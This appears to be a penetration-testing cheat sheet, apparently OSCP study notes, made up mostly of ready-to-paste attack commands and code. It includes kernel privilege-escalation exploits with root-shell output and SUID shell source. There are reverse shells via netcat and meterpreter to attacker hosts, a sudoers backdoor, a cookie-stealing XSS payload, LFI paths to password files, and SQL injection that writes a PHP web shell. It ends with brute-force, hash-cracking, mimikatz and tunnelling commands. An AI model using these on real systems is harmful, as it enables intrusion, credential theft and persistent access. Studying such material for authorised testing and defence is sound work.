- CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)
[https://www.exploit-db.com/exploits/14814/](https://www.exploit-db.com/exploits/14814/)
wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814
$ gcc i-can-haz-modharden.c -o i-can-haz-modharden
$ ./i-can-haz-modharden
[+] launching root shell!
# id
uid=0(root) gid=0(root)
- CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
[https://www.exploit-db.com/exploits/15285/](https://www.exploit-db.com/exploits/15285/)
- CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
[https://git.zx2c4.com/CVE-2012-0056/about/](https://git.zx2c4.com/CVE-2012-0056/about/)
Linux CVE 2012-0056
wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o mempodipper exploit.c
./mempodipper
- CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
[https://dirtycow.ninja/](https://dirtycow.ninja/)
First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016
- Run a command as a user other than root
sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf
- Add a user or change a password
/usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor
echo thePassword | passwd haxzor --stdin
- Local Privilege Escalation Exploit in Linux
- **SUID** (**S**et owner **U**ser **ID** up on execution)
Often SUID C binary files are required to spawn a shell as a
superuser, you can update the UID / GID and shell as required.
below are some quick copy and paste examples for various
shells:
SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
- Create and compile an SUID from a limited shell (no file transfer)
echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
gcc privsc.c -o privsc
- Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
`echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update`
- You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable
to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
port 4444.
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x ssh
- SearchSploit
searchsploit –uncsearchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
searchsploit slmail
- Kernel Exploit Suggestions for Kernel Version 3.0.0
`./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0`
- Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!***
[*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/)
- Collect root password
`cat /etc/shadow |grep root`
- Find and display the proof.txt or flag.txt - LOOT!
cat `find / -name proof.txt -print`
- Windows Privilege Escalation
--------------------------------------------------------------------------------------------------------------------------
- Windows Privilege Escalation resource
http://www.fuzzysecurity.com/tutorials/16.html
- Metasploit Meterpreter Privilege Escalation Guide
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
- Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:
`whoami`
`net user "%username%"`
- Try the getsystem command using meterpreter - rarely works but is worth a try.
`meterpreter > getsystem`
- No File Upload Required Windows Privlege Escalation Basic Information Gathering (based on the fuzzy security tutorial and windows_privesc_check.py).
Copy and paste the following contents into your remote Windows shell in Kali to generate a quick report:
@echo --------- BASIC WINDOWS RECON --------- > report.txt
timeout 1
net config Workstation >> report.txt
timeout 1
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt
timeout 1
hostname >> report.txt
timeout 1
net users >> report.txt
timeout 1
ipconfig /all >> report.txt
timeout 1
route print >> report.txt
timeout 1
arp -A >> report.txt
timeout 1
netstat -ano >> report.txt
timeout 1
netsh firewall show state >> report.txt
timeout 1
netsh firewall show config >> report.txt
timeout 1
schtasks /query /fo LIST /v >> report.txt
timeout 1
tasklist /SVC >> report.txt
timeout 1
net start >> report.txt
timeout 1
DRIVERQUERY >> report.txt
timeout 1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
timeout 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
timeout 1
dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt
timeout 1
findstr /si password *.xml *.ini *.txt >> report.txt
timeout 1
reg query HKLM /f password /t REG_SZ /s >> report.txt
timeout 1
reg query HKCU /f password /t REG_SZ /s >> report.txt
timeout 1
dir "C:\"
timeout 1
dir "C:\Program Files\" >> report.txt
timeout 1
dir "C:\Program Files (x86)\"
timeout 1
dir "C:\Users\"
timeout 1
dir "C:\Users\Public\"
timeout 1
echo REPORT COMPLETE!
- Windows Server 2003 and IIS 6.0 WEBDAV Exploiting
http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt
cadavar http://$ip
dav:/> put aspshell.txt
Uploading aspshell.txt to `/aspshell.txt':
Progress: [=============================>] 100.0% of 38468 bytes succeeded.
dav:/> copy aspshell.txt aspshell3.asp;.txt
Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.
dav:/> exit
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 1.2.3.4
msf exploit(handler) > set LPORT 80
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
curl http://$ip/aspshell3.asp;.txt
[*] Started reverse TCP handler on 1.2.3.4:443
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 1.2.3.5
[*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
- Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py
- Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
https://www.exploit-db.com/exploits/6705/
https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco
churrasco
/churrasco/-->Usage: Churrasco.exe [-d] "command to run"
c:\Inetpub>churrasco -d "net user /add <username> <password>"
c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"
- Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
python pyinstaller.py --onefile ms11-080.py
mx11-080.exe -O XP
- Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:
MS16-032 https://www.exploit-db.com/exploits/39719/
`powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"`
- Powershell Priv Escalation Tools
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
- Windows Run As - Switching users in linux is trival with the `SU` command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.
- Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).
C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
- Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:
C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
- PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password.
$username = '<username here>'
$password = '<password here>'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public
Next run this script using powershell.exe:
`powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"`
- Windows Service Configuration Viewer - Check for misconfigurations
in services that can lead to privilege escalation. You can replace
the executable with your own and have windows execute whatever code
you want as the privileged user.
icacls scsiaccess.exe
scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)
- Compile a custom add user command in windows using C
```
root@kali:~# cat useradd.c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i;
i=system ("net localgroup administrators low /add");
return 0;
}
```
`i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c`
- Group Policy Preferences (GPP)
A common useful misconfiguration found in modern domain environments
is unprotected Windows GPP settings files
- map the Domain controller SYSVOL share
`net use z:\\dc01\SYSVOL`
- Find the GPP file: Groups.xml
`dir /s Groups.xml`
- Review the contents for passwords
`type Groups.xml`
- Decrypt using GPP Decrypt
`gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB`
- Find and display the proof.txt or flag.txt - get the loot!
`#meterpreter > run post/windows/gather/win_privs`
`cd\ & dir /b /s proof.txt`
`type c:\pathto\proof.txt`
Client, Web and Password Attacks
==============================================================================================================================
- <span id="_pcjm0n4oppqx" class="anchor"><span id="_Toc480741817" class="anchor"></span></span>Client Attacks
------------------------------------------------------------------------------------------------------------
- MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html
<http://www.exploit-db.com/download/24017>
service apache2 start
- JAVA Signed Jar client side attack
echo '<applet width="1" height="1" id="Java Secure"
code="Java.class" archive="SignedJava.jar"><param name="1"
value="http://$ip:80/evil.exe"></applet>' >
/var/www/html/java.html
User must hit run on the popup that occurs.
- Linux Client Shells
[*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)
- Setting up the Client Side Exploit
- Swapping Out the Shellcode
- Injecting a Backdoor Shell into Plink.exe
backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip
-P 4444 -s reverse\_shell\_tcp
- <span id="_n6fr3j21cp1m" class="anchor"><span id="_Toc480741818" class="anchor"></span></span>Web Attacks
---------------------------------------------------------------------------------------------------------
- Web Shag Web Application Vulnerability Assessment Platform
webshag-gui
- Web Shells
[*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells)
`ls -l /usr/share/webshells/`
- Generate a PHP backdoor (generate) protected with the given
password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t
- Java Signed Applet Attack
- HTTP / HTTPS Webserver Enumeration
- OWASP Dirbuster
- nikto -h $ip
- Essential Iceweasel Add-ons
Cookies Manager
https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
Tamper Data
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
- Cross Site Scripting (XSS)
significant impacts, such as cookie stealing and authentication
bypass, redirecting the victim’s browser to a malicious HTML
page, and more
- Browser Redirection and IFRAME Injection
```html
<iframe SRC="http://$ip/report" height = "0" width="0"></iframe>
```
- Stealing Cookies and Session Information
```javascript
<javascript>
new image().src="http://$ip/bogus.php?output="+document.cookie;
</script>
```
nc -nlvp 80
- File Inclusion Vulnerabilities
-----------------------------------------------------------------------------------------------------------------------------
- Local (LFI) and remote (RFI) file inclusion vulnerabilities are
commonly found in poorly written PHP code.
- fimap - There is a Python tool called fimap which can be
leveraged to automate the exploitation of LFI/RFI
vulnerabilities that are found in PHP (sqlmap for LFI):
[*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap)
- Gaining a shell from phpinfo()
fimap + phpinfo() Exploit - If a phpinfo() file is present,
it’s usually possible to get a shell, if you don’t know the
location of the phpinfo file fimap can probe for it, or you
could use a tool like OWASP DirBuster.
- For Local File Inclusions look for the include() function in PHP
code.
```php
include("lang/".$_COOKIE['lang']);
include($_GET['page'].".php");
```
- LFI - Encode and Decode a file using base64
```bash
curl -s \
"http://$ip/?page=php://filter/convert.base64-encode/resource=index" \
| grep -e '\[^\\ \]\\{40,\\}' | base64 -d
```
- LFI - Download file with base 64 encoding
[*http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php*](about:blank)
- LFI Linux Files:
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/passwd
/etc/shadow
/root/.bash\_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root
- LFI Windows Files:
%SYSTEMROOT%\\repair\\system
%SYSTEMROOT%\\repair\\SAM
%SYSTEMROOT%\\repair\\SAM
%WINDIR%\\win.ini
%SYSTEMDRIVE%\\boot.ini
%WINDIR%\\Panther\\sysprep.inf
%WINDIR%\\system32\\config\\AppEvent.Evt
- LFI OSX Files:
/etc/fstab
/etc/master.passwd
/etc/resolv.conf
/etc/sudoers
/etc/sysctl.conf
- LFI - Download passwords file
[*http://$ip/index.php?page=/etc/passwd*](about:blank)
[*http://$ip/index.php?file=../../../../etc/passwd*](about:blank)
- LFI - Download passwords file with filter evasion
[*http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd*](about:blank)
- Local File Inclusion - In versions of PHP below 5.3 we can
terminate with null byte
GET
/addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
- Contaminating Log Files `<?php echo shell_exec($_GET['cmd']);?>`
- For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini
file must be configured to allow remote files
*/etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on"
`include($_REQUEST["file"].".php");`
- Remote File Inclusion
`http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt `
`<?php echo shell\_exec("ipconfig");?>`
- <span id="_mgu7e3u7svak" class="anchor"><span id="_Toc480741820" class="anchor"></span></span>Database Vulnerabilities
----------------------------------------------------------------------------------------------------------------------
- Playing with SQL Syntax
A great tool I have found for playing with SQL Syntax for a variety of database types (MSSQL Server, MySql, PostGreSql, Oracle) is SQL Fiddle:
http://sqlfiddle.com
Another site is rextester.com:
http://rextester.com/l/mysql_online_compiler
- Detecting SQL Injection Vulnerabilities.
Most modern automated scanner tools use time delay techniques to detect SQL injection vulnerabilities. This method can tell you if a SQL injection vulnerability is present even if it is a "blind" sql injection vulnerabilit that does not provide any data back. You know your SQL injection is working when the server takes a LOooooong time to respond. I have added a line comment at the end of each injection statement just in case there is additional SQL code after the injection point.
- **MSSQL Server SQL Injection Time Delay Detection:**
Add a 30 second delay to a MSSQL Server Query
- *Original Query*
`SELECT * FROM products WHERE name='Test';`
- *Injection Value*
`'; WAITFOR DELAY '00:00:30'; --`
- *Resulting Query*
`SELECT * FROM products WHERE name='Test'; WAITFOR DELAY '00:00:30'; --`
- **MySQL Injection Time Delay Detection:**
Add a 30 second delay to a MySQL Query
- *Original Query*
`SELECT * FROM products WHERE name='Test';`
- *Injection Value*
`'-SLEEP(30); #`
- *Resulting Query*
`SELECT * FROM products WHERE name='Test'-SLEEP(30); #`
- **PostGreSQL Injection Time Delay Detection:**
Add a 30 second delay to an PostGreSQL Query
- *Original Query*
`SELECT * FROM products WHERE name='Test';`
- *Injection Value*
`'; SELECT pg_sleep(30); --`
- *Resulting Query*
`SELECT * FROM products WHERE name='Test'; SELECT pg_sleep(30); --`
- Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and password
mysql -u root -p -h $ip
use "Users"
show tables;
select \* from users;
- Authentication Bypass
name='wronguser' or 1=1;
name='wronguser' or 1=1 LIMIT 1;
- Enumerating the Database
`http://192.168.11.35/comment.php?id=738)'`
Verbose error message?
`http://$ip/comment.php?id=738 order by 1`
`http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6 `
Determine MySQL Version:
`http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6 `
Current user being used for the database connection:
`http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6 `
Enumerate database tables and column structures
`http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables `
Target the users table in the database
`http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users' `
Extract the name and password
`http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users `
Create a backdoor
`http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'`
- **SQLMap Examples**
- Crawl the links
`sqlmap -u http://$ip --crawl=1`
`sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`
- SQLMap Search for databases against a suspected GET SQL Injection
`sqlmap –u http://$ip/blog/index.php?search –dbs`
- SQLMap dump tables from database oscommerce at GET SQL injection
`sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps `
- SQLMap GET Parameter command
`sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5 `
- SQLMap Post Username parameter
`sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all`
- SQL Map OS Shell
`sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell `
`sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell`
- Automated sqlmap scan
`sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"`
- Targeted sqlmap scan
`sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump`
- Scan url for union + error based injection with mysql backend and use a random user agent + database dump
`sqlmap -o -u http://$ip/index.php --forms --dbs `
`sqlmap -o -u "http://$ip/form/" --forms`
- Sqlmap check form for injection
`sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump`
- Enumerate databases
`sqlmap --dbms=mysql -u "$URL" --dbs`
- Enumerate tables from a specific database
`sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables `
- Dump table data from a specific database and table
`sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump `
- Specify parameter to exploit
`sqlmap --dbms=mysql -u "http://www.example.com/param1=value1¶m2=value2" --dbs -p param2 `
- Specify parameter to exploit in 'nice' URIs (exploits param1)
`sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs `
- Get OS shell
`sqlmap --dbms=mysql -u "$URL" --os-shell`
- Get SQL shell
`sqlmap --dbms=mysql -u "$URL" --sql-shell`
- SQL query
`sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"`
- Use Tor Socks5 proxy
`sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs`
- **NoSQLMap Examples**
You may encounter NoSQL instances like MongoDB in your OSCP journies (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help you to automate NoSQLDatabase enumeration.
- NoSQLMap Installation
```bash
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap/
ls
pip install couchdb
pip install pbkdf2
pip install ipcalc
python nosqlmap.py
```
- Often you can create an exception dump message with MongoDB using a malformed NoSQLQuery such as:
`a'; return this.a != 'BadData’'; var dummy='!`
- Password Attacks
--------------------------------------------------------------------------------------------------------------
- AES Decryption
http://aesencryption.net/
- Convert multiple webpages into a word list
```bash
for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \
done
```
- Or convert html to word list dict
`html2dic index.html.out | sort -u > index-html.dict`
- Default Usernames and Passwords
- CIRT
[*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)
- Government Security - Default Logins and Passwords for
Networked Devices
- [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)
- Virus.org
[*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)
- Default Password
[*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)
- Brute Force
- Nmap Brute forcing Scripts
[*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)
- Nmap Generic auto detect brute force attack:
`nmap --script brute -Pn <target.com or ip>`
- MySQL nmap brute force attack:
`nmap --script=mysql-brute $ip`
- Dictionary Files
- Word lists on Kali
`cd /usr/share/wordlists`
- Key-space Brute Force
- `crunch 6 6 0123456789ABCDEF -o crunch1.txt`
- `crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha`
- `crunch 8 8 -t ,@@^^%%%`
- Pwdump and Fgdump - Security Accounts Manager (SAM)
- `pwdump.exe` - attempts to extract password hashes
- `fgdump.exe` - attempts to kill local antiviruses before
attempting to dump the password hashes and
cached credentials.
- Windows Credential Editor (WCE)
- allows one to perform several attacks to obtain clear text
passwords and hashes. Usage: `wce -w`
- Mimikatz
- extract plaintexts passwords, hash, PIN code and kerberos
tickets from memory. mimikatz can also perform
pass-the-hash, pass-the-ticket or build Golden tickets
[*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)
From metasploit meterpreter (must have System level access):
```
meterpreter> load mimikatz
meterpreter> help mimikatz
meterpreter> msv
meterpreter> kerberos
meterpreter> mimikatz_command -f samdump::hashes
meterpreter> mimikatz_command -f sekurlsa::searchPasswords
```
- Password Profiling
- cewl can generate a password list from a web page
`cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`
- Password Mutating
- John the ripper can mutate password lists
nano /etc/john/john.conf
`john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`
- Medusa
- Medusa, initiated against an htaccess protected web
directory
`medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`
- Ncrack
- ncrack (from the makers of nmap) can brute force RDP
`ncrack -vv --user offsec -P password-file.txt rdp://$ip`
- Hydra
- Hydra brute force against SNMP
`hydra -P password-file.txt -v $ip snmp`
- Hydra FTP known user and rockyou password list
`hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp`
- Hydra SSH using list of users and passwords
`hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`
- Hydra SSH using a known password and a username list
`hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh`
- Hydra SSH Against Known username on port 22
`hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt`
- Hydra POP3 Brute Force
`hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V`
- Hydra SMTP Brute Force
`hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V`
- Hydra attack http get 401 login with a dictionary
`hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`
- Hydra attack Windows Remote Desktop with rockyou
`hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`
- Hydra brute force SMB user with rockyou:
`hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb`
- Hydra brute force a Wordpress admin login
`hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`
- <span id="_bnmnt83v58wk" class="anchor"><span id="_Toc480741822" class="anchor"></span></span>Password Hash Attacks
-------------------------------------------------------------------------------------------------------------------
- Online Password Cracking
[*https://crackstation.net/*](https://crackstation.net/)
[*http://finder.insidepro.com/*](http://finder.insidepro.com/)
- Hashcat
Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter.
`apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev`
and
`apt-get install pocl-opencl-icd`
Cracking Linux Hashes - /etc/shadow file
```
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
```
Cracking Windows Hashes
```
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
```
Cracking Common Application Hashes
```
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
10800 | SHA-384 | Raw Hash
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash
```
Create a .hash file with all the hashes you want to crack
puthasheshere.hash:
`$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/`
Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:
`hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt`
Wordpress sample hash: `$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/`
Wordpress clear text: `test`
Hashcat example cracking Wordpress passwords using rockyou:
`hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`
- Sample Hashes
[*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)
- Identify Hashes
`hash-identifier`
- To crack linux hashes you must first unshadow them:
`unshadow passwd-file.txt shadow-file.txt`
`unshadow passwd-file.txt shadow-file.txt > unshadowed.txt`
- John the Ripper - Password Hash Cracking
- `john $ip.pwdump`
- `john --wordlist=/usr/share/wordlists/rockyou.txt hashes`
- `john --rules --wordlist=/usr/share/wordlists/rockyou.txt`
- `john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt`
- JTR forced descrypt cracking with wordlist
`john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt`
- JTR forced descrypt brute force cracking
`john --format=descrypt hash --show`
- Passing the Hash in Windows
- Use Metasploit to exploit one of the SMB servers in the labs.
Dump the password hashes and attempt a pass-the-hash attack
against another system:
`export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 `
`pth-winexe -U administrator //$ip cmd`
<span id="_6nmbgmpltwon" class="anchor"><span id="_Toc480741823" class="anchor"></span></span>Networking, Pivoting and Tunneling
================================================================================================================================
- Port Forwarding - accept traffic on a given IP address and port and
redirect it to a different IP address and port
- `apt-get install rinetd`
- `cat /etc/rinetd.conf`
```
# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
```
- SSH Local Port Forwarding: supports bi-directional communication
channels
- `ssh <gateway> -L <local port to listen>:<remote host>:<remote port>`
- SSH Remote Port Forwarding: Suitable for popping a remote shell on
an internal non routable network
- `ssh <gateway> -R <remote port to bind>:<local host>:<local port>`
- SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
network on ANY PORT
- `ssh -D <local proxy port> -p <remote port> <target>`
- Proxychains - Perform nmap scan within a DMZ from an external
computer
- Create reverse SSH tunnel from Popped machine on :2222
`ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com`
`ssh -f -N -R 2222:<local host>:22 root@<remote host>`
- Create a Dynamic application-level port forward on 8080 thru
2222
`ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>`
- Leverage the SSH SOCKS server to perform Nmap scan on network
using proxy chains
`proxychains nmap --top-ports=20 -sT -Pn $ip/24`
- HTTP Tunneling
`nc -vvn $ip 8888`
- Traffic Encapsulation - Bypassing deep packet inspection
- http tunnel
On server side:
`sudo hts -F <server ip addr>:<port of your app> 80 `
On client side:
`sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel`
- Tunnel Remote Desktop (RDP) from a Popped Windows machine to your
network
- Tunnel on port 22
`plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>`
- Port 22 blocked? Try port 80? or 443?
`plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80`
- Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel
(bypass deep packet inspection)
- Windows machine add required firewall rules without prompting the user
- `netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes`
- `netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000`
- `netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080`
- `netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079`
- Start the http tunnel client
`httptunnel_client.exe`
